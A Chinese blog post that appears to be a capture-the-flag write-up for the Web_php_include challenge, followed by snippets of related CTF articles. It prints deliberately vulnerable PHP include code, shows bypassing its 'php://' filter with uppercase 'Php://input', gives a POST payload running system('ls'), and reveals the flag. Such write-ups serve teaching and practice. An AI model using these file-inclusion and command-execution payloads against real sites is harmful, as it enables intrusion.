【攻防世界-Web进阶篇-008Web_php_include】

最新推荐文章于 2022-07-13 17:27:34 发布
最新推荐文章于 2022-07-13 17:27:34 发布
阅读量2.1k 收藏
点赞数
文章标签: php 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gyy990526/article/details/123487859
版权

解:打开靶机显示一段php代码,进行代码审计

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

strstr() 函数搜索字符串在另一字符串中的第一次出现。

注释:该函数对大小写敏感。如需进行不区分大小写的搜索,请使用 stristr() 函数。

str_replace() 函数替换字符串中的一些字符(区分大小写)。

所以咱们可以用大写来绕过php://进行一句话木马查看文件,用bp抓个包,加入画红线的部分,读取目录

/?page=Php://input
<?php system("ls")?>

发现有个fl4gisisish3r3.php文件,cat一下就有答案了

 

 ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

旧梦已逝丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4049
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
Web_php_include(strstr与str_replace函数)
sGanYu
08-24 1236
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);#查找php://,null替换查找的值,并且规定搜索$page } include($page); ?> strstr函数 strstr(str1,str2) 函数,判断字符串str2是否是s...
文件包含--Web_php_include(攻防世界)
Curry197的博客
05-29 728
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 参考链接:Web_php_include_怪味巧克力的博客-CSDN博客 先认识一下代码里的两个函数: strstr: strstr(str1,st.
文件包含漏洞
weixin_63231007的博客
03-22 1087
定义: 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。 危险函数: include() , include_once() , require() , require_once(). 解题思路: 本地文件包含: 直接读取目标机上的Flag文件. 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件. 判断本地文件包含与远程文件包含方法: ...
php伪协议漏洞_文件包含漏洞+PHP的伪协议
weixin_29863809的博客
01-28 384
BugkuCTF点击发现url中有 ?file=show.php 并且题目flag在index里 猜测文件包含和PHP伪协议。猜测php://被过滤构造payload?file=php://filter/read=convert.base64-encode/resource=index.php用base64解码找到flagBugku-ctferror_reporting(0);if(!$_GET[...
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
最新发布
06-01
【网络攻防课程seed-labs实验-Web_XSS_Elgg.zip】是一个针对网络安全学习的实验,主要关注Web应用程序中的跨站脚本(XSS)攻击。XSS是一种常见的网络攻击方式,攻击者通过在网页中注入恶意脚本,使用户在不知情的...
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
06-01
《网络攻防课程:深入解析Web SQL注入》 在网络安全领域,Web应用安全是一个至关重要的环节,其中SQL注入(SQL Injection)是常见的攻击手段之一。本实验“网络攻防课程seed-labs实验-Web_SQL_Injection.zip”旨在...
php伪协议总结
a3320315的博客
09-29 1987
0x01 首先放源码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0x02 分析 s...
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4497
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
[吃烤羊腿烫烫烫] Web_php_include 题解分析
布屿
02-28 3257
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0.分析代码 我们先来分析一下代码吧。 &lt...
【XCTF高手进阶区】web4_Web_php_include writeup(二)
Mitchell_Donovan的博客
01-28 2088
web4_Web_php_include 原题链接 key:data://伪协议执行命令 ①打开页面还是那串代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 但是这次我们选择另一种
攻防世界 web进阶区1
qq_61768489的博客
07-13 873
baby_web 题目描述:想想初始页面是哪个 那第一感觉就是index.php 然后在url里面输入后直接跳转到1.php,所以抓包试试,就出了 Training-WWW-Robots 直接查看robots协议 PHP2 上来就这个 ,啥也没有 信息收集,后缀index.phps ,出现源码 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); e..
文件包含
hulitong的博客
10-17 1102
0x01 函数分析 <?phpshow_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page);?> strstr(): 定义和用法:搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回false。 strstr
CTF题目记录5
kkzzjx
05-22 1693
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page);//此处为文件包含,执行page中的内容 ?> 考察基础的文件包含,过滤了php:// page变量可以操控 思路:先找flag文件的
jsp中include和page指令的详解用法
热门推荐
低调的华丽 专栏
12-17 1万+
1.Include指令  该指令用于包含一个文本或代码的文件。  JSP语法:  例子:  include.jsp文件内容为:    Include指令测试    random.jsp中的随机显示的数为:        random.jsp文件中内容为:    在页面中显示为:  random.jsp中的随机显示的数为: 2148.093521070482  描述  Include指令在JSP文件
include file与jsp:include page的区别
吃根草的博客
07-16 1745
&lt;%include   file="a.jsp"%&gt;是在编译时加入,所谓静态,就是在编译的时候将a.jsp的代码加入进来在编译,之后运行.    &lt;jsp:include   page="a.jsp"/&gt;是在运行时加入,所谓动态,就是单独编译,在运行时候加入进来,之后显示,这种include,可以传递参数 一:执行时间上:    &lt;%@   include   fi...
page和include指令
Qiluluwawa的专栏
11-11 2049
Page指令和include指令 一.Page指令 1.page指令用于定义JSP页面的各种属性,无论page指令出现在JSP页面中的什么地方,它作用的都是整个JSP页面,为了保持程序的可读性和遵循良好的编程习惯,page指令最好是放在整个JSP页面的起始位置。 2、JSP 2.0规范中定义的page指令的完整语法: (1)、language="java":默认值是java语言; (2)
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值